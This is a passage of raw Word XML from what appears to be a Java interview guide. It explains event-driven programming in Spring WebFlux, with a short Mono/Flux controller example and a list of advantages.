      </w:r>
    </w:p>
    <w:p w14:paraId="0A694698" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Spring WebFlux is built around the concept of reactive streams. A reactive stream represents a sequence of events (data) that can be processed asynchronously. The reactive streams model defines </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>publishers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like Mono and Flux) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscribers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that handle the data asynchronously and can react to events like data arrival, completion, and errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C5EFBE"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vent Loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8AFA2E" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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n an event-driven system, an event loop is responsible for handling incoming events (requests) and processing them asynchronously without blocking the main thread. Spring WebFlux uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle incoming HTTP requests and events without waiting for them to complete before continuing to process other events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAC8C5A" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Spring WebFlux is built on top of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Netty</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Undertow</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Servlet 3.1+</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> containers, which use an event-driven, non-blocking I/O model to handle requests efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F914A23"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ctive Programming Paradigm</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D5FADA" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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he reactive programming paradigm used in Spring WebFlux is inherently event-driven. It revolves around </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>observables</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Mono and Flux), which represent streams of data that are </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>observed</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by subscribers. These subscribers react to the data being emitted by the observable (publisher).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23056ABE" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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For example, when a user sends an HTTP request, Spring WebFlux will treat that request as an event and return a Mono or Flux that emits the response asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DCC3EE"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Handling Asynchronous Events</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D555130" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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a traditional, blocking model, the system would wait for the completion of a task (like a database query or external API call) before moving to the next one. In an event-driven system, such tasks are handled asynchronously, and other events can be processed in parallel without blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D185C1B" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Spring WebFlux utilizes </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Schedulers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and methods like subscribeOn() and publishOn() to control the threads on which tasks should be executed, providing fine-grained control over task scheduling and event handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A923E17"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Backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0764E0BC" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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n event-driven programming, one of the challenges is dealing with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>—a situation where too many events arrive at once and overwhelm the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440E40BF" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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 WebFlux handles backpressure through reactive stream mechanisms like onBackpressureBuffer(), onBackpressureDrop(), or onBackpressureLatest(). These strategies allow the system to manage incoming events and handle them appropriately when the system is under load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D6BEEB"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vent-Driven Handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56672DEA" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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n Spring WebFlux, the event-driven nature is made evident through the use of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., HandlerFunction in functional programming style or @RestController in annotation-based programming).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F593D41" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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hen an HTTP request (event) is triggered, the corresponding handler function gets executed and returns a reactive type (Mono or Flux) to respond to the request. The response is also handled reactively, as events are processed asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8FB8E3" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>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 of Event-Driven Programming in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB4A0DF"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Here’s a simple example to demonstrate how event-driven programming works in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158C84FF" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>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ontroller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD6F963"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stController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342A2122"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F45EAD8" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="484F43F9"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Example endpoint that returns a Mono (single asynchronous result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EF89B1"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etMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378203CC"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String&gt; getHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8814E"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Mono.just("Hello, World!").delayElement(Duration.ofSeconds(2)); // Simulate delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E538CC"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29C0AB13" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6FBDE2"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Example endpoint that returns a Flux (multiple asynchronous results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD479F7"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etMapping("/numbers")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E57E407"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Flux&lt;Integer&gt; getNumbers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3BE93"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Flux.just(1, 2, 3, 4, 5).delayElements(Duration.ofMillis(500)); // Simulate delay between numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12430C09"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313167D9"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4F69BA9C"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the above example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2628D727"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Mono.just("Hello, World!")</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Represents an event that produces a single result asynchronously. It reacts to the HTTP request and sends the response after a 2-second delay (delayElement simulates some processing time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D2BCE7"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Flux.just(1, 2, 3, 4, 5)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Represents a sequence of events that produce multiple results asynchronously. The response is emitted in chunks with a delay of 500ms between each value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA59334" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>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vent-Driven Process Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0D0EF3"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HTTP Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903710B" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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user sends an HTTP GET request to /hello or /numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14149B13"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vent Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758DE6EA" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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 WebFlux maps the incoming HTTP request to the appropriate event handler method (getHello() or getNumbers()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE095FE"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ctive Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E71C32" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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handler method returns a Mono or Flux that represents a stream of events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E318BB8" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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processing of the events happens asynchronously on a non-blocking thread, so the server can handle other incoming requests while waiting for the event results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC9FEB7"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Backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293D8966" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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f there is a large volume of events, Spring WebFlux handles them without overwhelming the system. The system can slow down or apply strategies to ensure the response is manageable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CCDC81"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lastRenderedPageBreak/>
        <w:t>Event Completion</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26342186" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Once the event (response) is ready, Spring WebFlux completes the pipeline and sends the result to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F6D14B" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>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Advantages of Event-Driven Programming in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC80C40"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Non-Blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688AE391" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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ebFlux allows handling multiple requests concurrently using fewer threads, reducing the need for blocking threads when waiting for I/O operations (e.g., database calls, network requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3349164E"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calable</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E98601" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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system can efficiently handle a large number of concurrent connections without consuming excessive system resources. This is especially useful in microservices architectures or applications with high concurrency requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC69BC5"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l-Time Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7052B260" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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vent-driven programming allows real-time updates by emitting events as soon as they are available, providing low-latency responses for applications like chat applications or real-time dashboards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F91F69A"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Backpressure Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAE30D0" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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ebFlux provides mechanisms for controlling backpressure, ensuring that the system remains responsive even under heavy load conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E935E3F"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Improved Resource Utilization</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26938A0E" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Because of the non-blocking nature, WebFlux can make better use of resources (CPU, memory, etc.) and can be deployed in environments with limited resources, such as cloud-native applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0523F59C" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F920FD4" w14:textId="77777777" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0" w:rsidP="007264A0">
      <w:pPr>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the context of Spring WebFlux, event-driven programming enables building highly scalable, non-blocking, and efficient web applications that can handle many concurrent requests. By using reactive programming and the Reactor framework, Spring WebFlux makes it easy to write event-driven code that reacts to HTTP requests and other events in a performant and scalable manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE21760"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5F0164F">
          <v:rect id="_x0000_i2318" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA78727" w14:textId="2913F026" w:rsidR="00163F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="004A4102" w:rsidP="004A4102">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="519" w:name="_Toc196307999"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Spring WebFlux handle asynchronous communication in event-driven systems</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="519"/>
    </w:p>
    <w:p w14:paraId="64591759" w14:textId="15D6517F" w:rsidR="007264A0" w:rsidRPr="00B13F85" w:rsidRDefault="007264A0"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Spring WebFlux handles asynchronous communication in event-driven systems by leveraging the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
